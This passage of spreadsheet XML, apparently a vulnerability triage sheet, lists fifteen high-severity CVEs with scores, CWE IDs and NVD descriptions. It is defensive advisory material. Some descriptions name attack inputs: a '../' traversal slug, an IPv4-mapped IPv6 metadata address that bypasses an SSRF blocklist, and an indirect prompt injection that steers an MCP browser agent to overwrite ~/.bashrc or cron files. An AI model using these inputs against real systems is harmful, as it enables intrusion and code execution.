          <t>CVE-2026-26212</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>Rara One Click Demo Import plugin for WordPress before 1.3.5 contains an arbitrary file upload vulnerability that allows authenticated attackers with Administrator privileges to upload arbitrary PHP files by passing a false value to wp_handle_upload() that disables WordPress core's file type validation checks across all three file parameters in the process_uploaded_files() function. Attackers can upload a malicious PHP file to the uploads directory and execute it over HTTP to achieve remote code execution in the web server process, with the uploaded file persisting on disk even after plugin deactivation and leaving no media library record to evade standard integrity checks.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26212</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34741</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, authentication bypass allows unauthenticated remote attackers to execute arbitrary PHP files from the env-production directory on a new iTop instance in the production environment. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34741</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47727</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the default-on "Safe import" filter fails to neutralize the shareTemplate relation because that relation is not marked as dangerous, allowing an attacker-supplied import archive to plant a server-side template that leads to remote code execution. The relation is omitted from the built-in list of dangerous attributes, so unlike other code-loading relations it is not disabled on import, and when the victim later publishes the imported note the public share renderer feeds the linked EJS code note's raw bytes into ejs.render, which compiles them in the server's Node process. An unauthenticated request to the shared note then executes the attacker's JavaScript with full access to require, process, the filesystem, and the network. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47727</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49310</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49310</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52776</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a tooling platform for managing compliance as code. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the URLSecurityValidator that guards trestle's remote-fetch paths against server-side request forgery can be bypassed to reach loopback, link-local, cloud-metadata, and internal network endpoints it was designed to block. The blocklist does not canonicalize IPv4-mapped IPv6 literals such as [::ffff:169.254.169.254], which resolve to IPv6Address objects that never match the blocked IPv4 ranges, and it does not block the unspecified address 0.0.0.0, which routes to local services on Linux and inside containers. An attacker who can supply or influence an OSCAL artifact that trestle fetches, such as a malicious profile whose imports reference one of these bypass URLs, can cause the HTTPSFetcher and SFTPFetcher paths to contact cloud instance-metadata services, loopback interfaces, or internal hosts. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52776</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54511</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-117, CWE-93</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>LogTape is an unobtrusive logging library. Prior to 1.3.11, 2.0.14, and 2.1.5, the @logtape/syslog package's escapeStructuredDataValue() function in packages/syslog/src/syslog.ts does not neutralize C0 control characters from U+0000 through U+001F in structured data values, and formatStructuredData() inserts property keys without validating the RFC 5424 SD-NAME grammar. When includeStructuredData is true, an attacker-controlled newline can terminate an RFC 6587 non-transparent TCP syslog frame and make following bytes appear as a forged RFC 5424 record, while a key containing a closing bracket or other forbidden character can terminate or corrupt the structured-data element. Applications that forward attacker-controlled property values or keys can therefore allow forged records with arbitrary hosts, applications, process identifiers, facilities, or severity levels, undermining downstream collector and SIEM integrity. This issue is fixed in versions 1.3.11, 2.0.14, and 2.1.5.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54511</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55182</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions from 21.6.0 up to 26.5.0, the Signal alert transport is vulnerable to command injection because the signal-cli path and the Recipient field of an alert transport entry are insufficiently escaped before being passed to an exec call. An authenticated administrator can craft a transport entry whose Recipient contains shell metacharacters and whose path points to the bundled composer_wrapper.php script, which itself passes attacker-controlled input to further unsafe exec calls. By chaining these calls, the administrator can execute arbitrary operating-system commands on the LibreNMS host. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55182</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55534</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. From praisonai 4.6.34 until 4.6.58, praisonai serve agents accepts --api-key but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. A network caller can invoke configured agents without credentials even when an API key was supplied. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55534</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55539</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, the Jobs API create_app function mounts /api/v1/runs without authentication. Any reachable caller can submit jobs, read results, cancel runs, or delete jobs using operator credentials. The fix adds PRAISONAI_JOBS_API_KEY middleware for Authorization or X-API-Key. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55539</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55557</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>browse-mcp is a Playwright-based headless-browser MCP server for MCP-capable agents. Prior to 0.8.2, browser_download writes a fetched response body to join(save_dir, filename) without validating the caller-controlled save_dir, while browser_save_state and browser_load_state honor a caller-controlled path unchanged. A malicious MCP client, or an autonomous agent steered by indirect prompt injection on a visited page, can choose an arbitrary save_dir or state path and a URL whose response body becomes attacker-controlled file contents, allowing writes to any path the process can reach, including ~/.bashrc, autostart entries, or cron files, and potentially leading to host code execution. The force_fetch fallback also uses a raw fetch() that bypasses the BROWSE_MCP_ALLOWED_ORIGINS origin fence. This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55557</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55580</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, config.go initializes Security.Enabled to false, and when MCP_SHELL_SEC_CONFIG_FILE is unset, main.go starts the documented bare-binary deployment without a security policy. SecurityValidator.validateCommand in security.go then short-circuits and allows every command supplied to the shell_exec MCP tool, so an LLM connected over stdio can execute unrestricted OS commands as the mcp-shell process user. The README from-source installation and MCP client configuration omit MCP_SHELL_SEC_CONFIG_FILE, making the insecure state the documented default. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55580</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63219</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the API endpoint for creating a new formatter via file upload is unprotected and allows the upload of external uncontrolled files. An unauthenticated attacker can upload arbitrary `.xsl` or `.zip` formatter files to the server.  An unauthenticated attacker can write arbitrary files into the GeoNetwork formatter directory. On its own this constitutes unauthorized write access to server storage. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63219</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="270">
